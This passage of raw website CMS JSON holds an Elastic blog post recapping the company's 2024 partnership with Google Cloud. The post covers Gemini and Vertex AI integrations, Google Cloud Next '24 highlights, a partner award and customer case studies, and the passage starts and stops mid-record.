10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse1edc4c2d41ebf2e"}}}],"publish_date":"2024-12-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt62646ad19dd7b0b8","ACL":{},"created_at":"2020-06-17T03:23:52.847Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"government","label_l10n":"Government","tags":[],"title":"Government","updated_at":"2020-07-06T22:17:42.931Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.550Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt5ebb3c17304b01bc","ACL":{},"created_at":"2023-11-06T20:47:38.117Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"privacy-first-ai","label_l10n":"Privacy-first AI","tags":[],"title":"Privacy-first AI","updated_at":"2023-11-06T20:47:38.117Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:58.404Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","uid":"bltc6e3d049760fc06a","title":"Government","label_l10n":"Government","keyword":"government","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:40:32.959Z","updated_at":"2023-11-06T20:40:32.959Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.338Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt95f623e7d7b95b00","_version":1,"title":"Elastic Banner_4.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-18T19:18:23.682Z","updated_at":"2024-12-18T19:18:23.682Z","content_type":"image/jpeg","file_size":"129530","filename":"Elastic_Banner_4.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-18T21:57:17.756Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt95f623e7d7b95b00/67631fff21e0668234413416/Elastic_Banner_4.jpg"},"title":"The evolution of AI regulation in Asia: A comparative analysis","title_l10n":"The evolution of AI regulation in Asia: A comparative analysis","updated_at":"2024-12-18T21:57:08.406Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/artificial-intelligence-regulation-asia-comparative-analysis","publish_details":{"time":"2024-12-18T21:57:17.366Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltc7ff7c90901091b5","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"View highlights of our collaboration with Google Cloud to better serve customers in 2024. Receiving the Google Cloud Partner of the Year Award for Technology: Marketplace – Data \u0026 Analytics is a testament to our strong technological partnership. ","author":["blt39dee51344f15656","blt3d2f00b7dc02254f","blt386c5e3797d5d0e4","blte8301cde5091dc88"],"category":["bltc17514bfdbc519df"],"created_at":"2024-12-18T15:41:31.851Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs44109f0ccc8c47d6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic and Google Cloud create a powerhouse of AI-driven insights, providing an end-to-end search, observability, and security journey to our joint customers. We continue to partner on many opportunities for success, especially around generative AI (GenAI), and have made further progress this year in empowering customers throughout their business transformation.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis blog highlights our top moments from Google Cloud Next ‘24 and our collaboration with Google Cloud to better serve customers in 2024.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Delivering synergistic results","_metadata":{"uid":"cse7194ecd412fec00"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic and Google Cloud have partnered to create production-ready GenAI solutions for you. Read further to see what we’ve been working on this year to help you expand your capabilities as an organization.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elasticsearch and Gemini","_metadata":{"uid":"csc89d3cd74666ac14"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic is pleased to be the first and only ISV to be integrated directly into Vertex AI’s UI and SDK — allowing for seamless, grounded Gemini prompts and agents by using our vector search features. We also integrate with Google Cloud’s embedding, reranking, and completion models to create and rank vectors with a unified experience.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic supports multiple data formats and models, making it an ideal companion for Gemini, particularly in developing multimodal retrieval augmented generation (RAG) apps.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe use Gemini not only for building AI apps but also to empower IT operations, such as in the \u003c/span\u003e\u003ca href=\"https://elasticnv2022rd.q4web.com/news/news-details/2024/Elastic-Attack-Discovery-and-AI-Assistant-for-Security-Now-Support-Google-Cloud-Vertex-AI/default.aspx\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistants\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/ai-driven-security-analytics\"\u003e\u003cspan style='font-size: 12pt;'\u003eAttack Discovery\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/automatic-import-ai-data-integration-builder\"\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatic Import\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, reducing daily effort for security analysts and SREs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe further extended our capabilities this year with the ability to monitor Google Cloud’s AI services and models to extract insights on their usage and performance. Our product partnership allows automating daily data analysis tasks on Elastic through agent assistants and AI-driven features powered by Gemini. It reduces manual efforts, allowing teams to focus on innovation.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Vector database","_metadata":{"uid":"cs94cc153f6f0f3438"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch — \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003ethe world’s most widely deployed vector database\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — provides powerful search and analytics features by allowing the storage, indexing, and querying of vector representations of data. These vectors can represent complex data types, such as text embeddings, image features, or other multidimensional data, enabling highly efficient similarity searches and nearest neighbor queries.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic supports vector creation both at the ingest and query phases via Vertex (and Google AI Studio) embeddings and reranking models. Configurable with just a few clicks as inference services within Elastic’s platform and APIs, it drives the adoption and consumption of Google’s GenAI models and tools.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic is the perfect vector database for multiple data formats and multimodal interaction, making it the best companion of Gemini’s various interactive experiences. Gemini is also integrated in Elasticsearch’s Playground feature, allowing the prototyping, testing, and deploying of RAG-based GenAI applications on top of Elastic’s vector database.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Real-time analytics search layer","_metadata":{"uid":"cs597e7d761b5c84c4"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic empowers you to extract actionable insights from your data, driving business transformation through our robust search and analytics engine. Elastic acts as a search layer on top of Google Cloud’s data and analytics suite and uses dedicated integrations for both consumer (Gmail and Google Drive) and enterprise (Pub/Sub, CE, GKE, and Vertex) services.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn 2024, customers used our native Dataflow templates. The ease-of-use benefits are a significant driver in the adoption of Elastic on Google Cloud. With BigQuery, we see our joint customers adopting Elastic as a real-time analytics speed layer on top of their data lake. With Pub/Sub integration, we enable the collection of events, logs, and metrics to provide full visibility of the Google Cloud landscape.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Google Cloud Next ‘24 highlights","_metadata":{"uid":"cs233a3ad03d389d51"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Key moments","_metadata":{"uid":"csece4173ab66b6660"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePartner of the year award\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eFollowing our 2023 Google Cloud Technology Partner of the Year Award, we were pleased to announce that we were again chosen for the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-wins-google-cloud-partner-of-the-year\"\u003e\u003cspan style='font-size: 12pt;'\u003e2024 Google Cloud Partner of the Year Award for Technology: Marketplace – Data \u0026amp; Analytics\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This award recognizes one partner with a data and analytics product in Google Cloud Marketplace who helped mutual customers achieve outstanding business outcomes with Google Cloud.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe fact that Elastic has won a Google Cloud Partner of the Year Award four times is a testament to our strategic partnership and technological collaboration.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs86377b1d19fba605"}}},{"image":{"image":{"uid":"blt9d3d89108475d152","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T15:43:35.739Z","created_by":"bltb6c155cd84fc0c1a","file_size":"3909099","filename":"Screenshot_2024-12-18_at_10.43.22_AM.png","parent_uid":null,"tags":[],"title":"Screenshot 2024-12-18 at 10.43.22 AM.png","updated_at":"2024-12-18T15:43:35.739Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T16:00:00.924Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d3d89108475d152/6762eda79c8b726005bb93f8/Screenshot_2024-12-18_at_10.43.22_AM.png"},"_metadata":{"uid":"csb37abf1d4fb436c4"},"caption_l10n":"","alt_text_l10n":"Partner of the year award","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3eaf612fa5988407"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCloud talk\u003cbr bold=\"[object Object]\"/\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eKathleen Walker, senior director of Search product marketing, took the stage for a Cloud Talk on better AI decision-making with Elastic on Google Cloud.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd416cb66cf256ed3"}}},{"image":{"image":{"uid":"blt4de8afc89a303b2b","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T15:42:45.672Z","created_by":"bltb6c155cd84fc0c1a","file_size":"1342510","filename":"Screenshot_2024-12-18_at_10.42.37_AM.png","parent_uid":null,"tags":[],"title":"Screenshot 2024-12-18 at 10.42.37 AM.png","updated_at":"2024-12-18T15:42:45.672Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T16:00:01.008Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4de8afc89a303b2b/6762ed754e7675dbf0ef3169/Screenshot_2024-12-18_at_10.42.37_AM.png"},"_metadata":{"uid":"cs0fd06f03abd4bbbe"},"caption_l10n":"","alt_text_l10n":"Cloud talk","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf326785c61a2d6aa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eLightning talks\u003cbr bold=\"[object Object]\"/\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOur booth was packed for more than 20 lightning talks with Elastic experts presenting on topics like the Elastic AI Assistant, Elasticsearch Relevance Engine (ESRE), RAG, Elastic and Vertex AI, and more.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa819eabbbbee0479"}}},{"image":{"image":{"uid":"blt269bd2dc097800ff","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T15:44:03.123Z","created_by":"bltb6c155cd84fc0c1a","file_size":"1767888","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-12-18T15:44:03.123Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T16:00:00.943Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt269bd2dc097800ff/6762edc3af051b78d213fc9f/image2.png"},"_metadata":{"uid":"cs09449afbcf9d9f08"},"caption_l10n":"","alt_text_l10n":"Lightning talks","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"image":{"image":{"uid":"blt31b498c98ee37e67","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T15:44:50.369Z","created_by":"bltb6c155cd84fc0c1a","file_size":"945892","filename":"Screenshot_2024-12-18_at_10.44.38_AM.png","parent_uid":null,"tags":[],"title":"Screenshot 2024-12-18 at 10.44.38 AM.png","updated_at":"2024-12-18T15:44:50.369Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T16:00:00.960Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt31b498c98ee37e67/6762edf21cd21e80aac278cf/Screenshot_2024-12-18_at_10.44.38_AM.png"},"_metadata":{"uid":"cs2f7c85b981f222b2"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs71e553c4ef4f1da4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eKathleen Walker also shared more insights on GenAI during \u003c/span\u003e\u003ca href=\"https://www.youtube.com/watch?v=iMOr5FfGLbM\u0026authuser=0\"\u003e\u003cspan style='font-size: 12pt;'\u003ean interview with theCUBE\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs38f4b629d4456cae"}}},{"image":{"image":{"uid":"blt7eb5dd1aaba59b46","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T15:45:05.563Z","created_by":"bltb6c155cd84fc0c1a","file_size":"3450487","filename":"image4.png","parent_uid":null,"tags":[],"title":"image4.png","updated_at":"2024-12-18T15:45:05.563Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T16:00:00.992Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7eb5dd1aaba59b46/6762ee01ad0534b7682c1ff5/image4.png"},"_metadata":{"uid":"cs71201bd9d6e4b4cc"},"caption_l10n":"","alt_text_l10n":"Kathleen Walker interview with theCUBE","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse0e47fa8290ea6bb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBe sure to visit the Elastic booth at Google Cloud NEXT '25!\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Building momentum together: 2024 recap","_metadata":{"uid":"cs020a4d1823f90ba5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur partnership momentum with Google Cloud has continued to grow substantially throughout 2024. Below is a recap of our joint efforts over the past year to help you address your evolving use cases and derive the most value possible from Elastic on Google Cloud.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Integrations","_metadata":{"uid":"csbfb296061448e9fb"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs we mentioned at the beginning of this blog, Elastic and Google Cloud have collaborated on a number of AI integrations that you can reference below. All of these are intended to help with your most prevalent GenAI challenges.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVertex AI — Embeddings models in Inference API:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Integrates usage of VertexAI embeddings models in Elastic’s Inference API.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVertex AI Rerank in Inference API: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIntegrates with Vertex AI Agent Builder — rerank feature — and callable from Inference API endpoint to rerank documents for RAG.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eGoogle AI Studio — Embeddings models in Inference API: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIntegrates embeddings creations from Google AI Studio into Elastic’s Inference API.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eGoogle AI Studio — Completion models in Inference API:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Integrates completion models from Google AI Studio into Elastic’s Inference API.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ePlayground with Gemini:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Includes Gemini as a large language model (LLM) in the new Elasticsearch feature, Playground.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eElastic AI Assistant for Security and Observability with Gemini: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAllows Gemini to be used as an LLM for the Elastic AI Assistant for Observability. Gemini offers a much bigger context tokens amount, which is perfect for investigating a high number of alerts combined.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAttack Discovery with Gemini: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAllows Gemini to be used as an LLM for the Attack Discovery feature.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVertex AI observability monitoring: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMonitors Vertex AI built-in and custom-deployed models usage like token usage, response time, resource consumption, and audit logs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVertex AI — Elasticsearch for built-in grounding:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Gemini can natively be grounded via Google Cloud console, APIs, and Vertex SDK with Elasticsearch.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Press releases","_metadata":{"uid":"csb29f1e2f9b5e5122"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://ir.elastic.co/news/news-details/2024/Elastic-Announces-AI-Ecosystem-to-Accelerate-GenAI-Application-Development/default.aspx\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Announces AI Ecosystem to Accelerate GenAI Application Development\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://ir.elastic.co/news/news-details/2024/Elasticsearch-Open-Inference-API-now-Supports-Google-AI-Studio/default.aspx\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Open Inference API now Supports Google AI Studio\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://ir.elastic.co/news/news-details/2024/Elasticsearch-Open-Inference-API-and-Playground-Support-Google-Clouds-Vertex-AI-Platform/default.aspx\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Open Inference API and Playground Support Google Cloud’s Vertex AI Platform\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Blogs","_metadata":{"uid":"csfed09114acf931f1"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe blogs below provide deeper information and tutorials on how to best use Elastic solutions.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/unlock-power-of-data-with-rag-vertex-ai-elasticsearch\"\u003e\u003cspan style='font-size: 12pt;'\u003eUnlock the Power of Your Data with RAG using Vertex AI and Elasticsearch\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/vertex-ai-elasticsearch-open-inference-api\"\u003e\u003cspan style='font-size: 12pt;'\u003eVertex AI integration with Elasticsearch open inference API brings reranking to your RAG applications\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/vertex-ai-elasticsearch-playground-fast-rag-apps\"\u003e\u003cspan style='font-size: 12pt;'\u003eQuickly create RAG apps with Vertex AI Gemini models and Elasticsearch playground\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/google-ai-studio-elasticsearch-open-inference-api\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch open inference API adds support for Google AI Studio\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/encryption-at-rest-elastic-cloud-google-cloud\"\u003e\u003cspan style='font-size: 12pt;'\u003eEncryption at rest in Elastic Cloud: Bring your own key with Google Cloud\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-google-vertex-ai-integration\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant and Attack Discovery integrate with Google Vertex AI to help drive further AI adoption\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-google-cloud-security-data-ingestion-incident-response\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic and Google Cloud: Enhancing security analytics from data ingestion to incident response\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/sap-observability-elastic-google-kyndryl\"\u003e\u003cspan style='font-size: 12pt;'\u003eEnd-to-end SAP Observability with Elastic, Google Cloud, and Kyndryl: A deep dive\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-vector-profile-gcp\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud adds Elasticsearch Vector Database optimized instance to Google Cloud\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-on-google-distributed-cloud-hosted\"\u003e\u003cspan style='font-size: 12pt;'\u003eSovereign solutions for sensitive workloads: Elastic on Google Distributed Cloud Hosted\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/keeping-your-elasticsearch-index-current-with-python-and-google-cloud-platform-functions\"\u003e\u003cspan style='font-size: 12pt;'\u003eKeeping your Elasticsearch index current with Python and Google Cloud Platform Functions\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/migration-elastic-stack-to-elastic-cloud-snapshot-and-restore-google-cloud-storage\"\u003e\u003cspan style='font-size: 12pt;'\u003eMigrating from self-managed Elastic Stack to Elastic Cloud using snapshot and restore with Google Cloud Storage\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Key joint GenAI in-person events and roadshows","_metadata":{"uid":"cs2a1389b250df11ef"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAMER: San Francisco, Seattle\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAPJ: Taiwan, Korea, India, NZ\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEMEA: London\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLATAM: Chile, Brazil, Colombia\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Customer case studies","_metadata":{"uid":"cs4b8aea4a72057860"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHelping our customers address challenges and realize opportunities using Elastic solutions on Google Cloud fuels our strategic collaboration. Below are a handful of these examples over the past year.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/apna\"\u003e\u003cspan style='font-size: 12pt;'\u003eApna puts Elasticsearch on Google Cloud at the heart of its billion-dollar growth strategy to drive revenue and improve productivity\u0026nbsp;\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/n11\"\u003e\u003cspan style='font-size: 12pt;'\u003eTurkish ecommerce giant, N11, migrates to Elastic Security in just two weeks\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/japanese-gaming\"\u003e\u003cspan style='font-size: 12pt;'\u003eJapanese gaming giant launches revolutionary online game where 